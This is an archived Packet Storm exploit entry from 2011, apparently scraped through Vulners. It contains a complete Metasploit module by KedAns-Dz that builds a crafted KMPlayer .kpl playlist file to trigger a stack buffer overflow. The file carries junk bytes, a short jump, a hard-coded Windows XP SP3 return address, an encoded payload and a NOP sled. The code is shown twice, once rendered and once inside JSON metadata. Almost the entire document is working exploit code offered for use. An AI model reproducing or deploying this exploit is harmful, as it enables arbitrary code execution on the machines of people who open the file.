Search...

KMPlayer 2.9.x (.kpl) Stack Buffer Overflow

2011-04-22T00:00:00

ID PACKETSTORM:100687
Type packetstorm
Reporter KedAns-Dz
Modified 2011-04-22T00:00:00

Description

                                        
                                            `1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ &gt;&gt; Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KedAns-Dz member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
# KMPlayer &lt;=2.9.x (.kpl) Stack Buffer Overflow (meta)  
# By KedAns-Dz  
# $ kmp_sbof.rb | 21/04/2011 13:30 $  
# Windows XP Sp3 Fr  
  
require 'msf/core'  
  
class Metasploit3 &lt; Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::FILEFORMAT  
  
def initialize(info = {})  
super(update_info(info,  
'Name' =&gt; 'KMPlayer 2.9.x (.kpl) Stack Buffer Overflow',  
'Description' =&gt; %q{  
This module exploits a stack buffer overflow in versions v2.9.3  
creating a specially crafted .kpl file, an attacker may be able   
to execute arbitrary code.  
},  
'License' =&gt; MSF_LICENSE,  
'Author' =&gt; 'KedAns-Dz &lt;ked-h[at]hotmail.com&gt;',  
'Version' =&gt; 'Version 1',  
'References' =&gt;  
[  
[ 'URL', 'Not Detected Olden This' ],  
],  
'DefaultOptions' =&gt;  
{  
'EXITFUNC' =&gt; 'process',  
},  
'Payload' =&gt;  
{  
'Space' =&gt; 1900,  
'BadChars' =&gt; "\x00\x20\x0a\x0d",  
'StackAdjustment' =&gt; -3500,  
'DisableNops' =&gt; 'True',  
'EncoderType' =&gt; Msf::Encoder::Type::AlphanumMixed,  
'EncoderOptions' =&gt;  
{  
'BufferRegister' =&gt; 'ESI',  
}  
},  
'Platform' =&gt; 'win',  
'Targets' =&gt;  
[  
[ 'Windows XP SP3 France', { 'Ret' =&gt; 0x0247fff4} ], # CALL from ntdll.dll  
  
],  
'Privileged' =&gt; false,  
'DefaultTarget' =&gt; 0))  
  
register_options(  
[  
OptString.new('FILENAME', [ false, 'The file name.', 'KedAns.kpl']),  
], self.class)  
end  
  
  
def exploit  
  
sploit = "[playlist]\n"  
sploit &lt;&lt; "NumberOfEntries=1\n"  
sploit &lt;&lt; "File1=http://"  
sploit &lt;&lt; "\x41" * 200 # buffer Junk  
sploit &lt;&lt; "\xeb\x06\x90\x90" # short jump  
sploit &lt;&lt; "\x90" * 30 # nop  
sploit &lt;&lt; [target.ret].pack('V')  
sploit &lt;&lt; payload.encoded  
sploit &lt;&lt; "\x90" * 543 # nop sled  
sploit &lt;&lt; ".mp3"  
ked = sploit  
print_status("Creating '#{datastore['FILENAME']}' file ...")  
file_create(ked)  
  
end  
  
end`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:100687", "type": "packetstorm", "bulletinFamily": "exploit", "title": "KMPlayer 2.9.x (.kpl) Stack Buffer Overflow", "description": "", "published": "2011-04-22T00:00:00", "modified": "2011-04-22T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/100687/KMPlayer-2.9.x-.kpl-Stack-Buffer-Overflow.html", "reporter": "KedAns-Dz", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:16:39", "viewCount": 3, "enchantments": {"score": {"value": 1.1, "vector": "NONE", "modified": "2016-11-03T10:16:39", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:16:39", "rev": 2}, "vulnersScore": 1.1}, "sourceHref": "https://packetstormsecurity.com/files/download/100687/kmp_sbof.rb.txt", "sourceData": "`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 \n0 _ __ __ __ 1 \n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0 \n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1 \n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0 \n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1 \n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0 \n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1 \n1 \\ \\____/ >> Exploit database separated by exploit 0 \n0 \\/___/ type (local, remote, DoS, etc.) 1 \n1 1 \n0 [+] Site : 1337day.com 0 \n1 [+] Support e-mail : submit[at]1337day.com 1 \n0 0 \n1 ######################################### 1 \n0 I'm KedAns-Dz member from Inj3ct0r Team 1 \n1 ######################################### 0 \n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 \n \n# KMPlayer <=2.9.x (.kpl) Stack Buffer Overflow (meta) \n# By KedAns-Dz \n# $ kmp_sbof.rb | 21/04/2011 13:30 $ \n# Windows XP Sp3 Fr \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'KMPlayer 2.9.x (.kpl) Stack Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in versions v2.9.3 \ncreating a specially crafted .kpl file, an attacker may be able \nto execute arbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => 'KedAns-Dz <ked-h[at]hotmail.com>', \n'Version' => 'Version 1', \n'References' => \n[ \n[ 'URL', 'Not Detected Olden This' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1900, \n'BadChars' => \"\\x00\\x20\\x0a\\x0d\", \n'StackAdjustment' => -3500, \n'DisableNops' => 'True', \n'EncoderType' => Msf::Encoder::Type::AlphanumMixed, \n'EncoderOptions' => \n{ \n'BufferRegister' => 'ESI', \n} \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows XP SP3 France', { 'Ret' => 0x0247fff4} ], # CALL from ntdll.dll \n \n], \n'Privileged' => false, \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ false, 'The file name.', 'KedAns.kpl']), \n], self.class) \nend \n \n \ndef exploit \n \nsploit = \"[playlist]\\n\" \nsploit << \"NumberOfEntries=1\\n\" \nsploit << \"File1=http://\" \nsploit << \"\\x41\" * 200 # buffer Junk \nsploit << \"\\xeb\\x06\\x90\\x90\" # short jump \nsploit << \"\\x90\" * 30 # nop \nsploit << [target.ret].pack('V') \nsploit << payload.encoded \nsploit << \"\\x90\" * 543 # nop sled \nsploit << \".mp3\" \nked = sploit \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \nfile_create(ked) \n \nend \n \nend`\n"}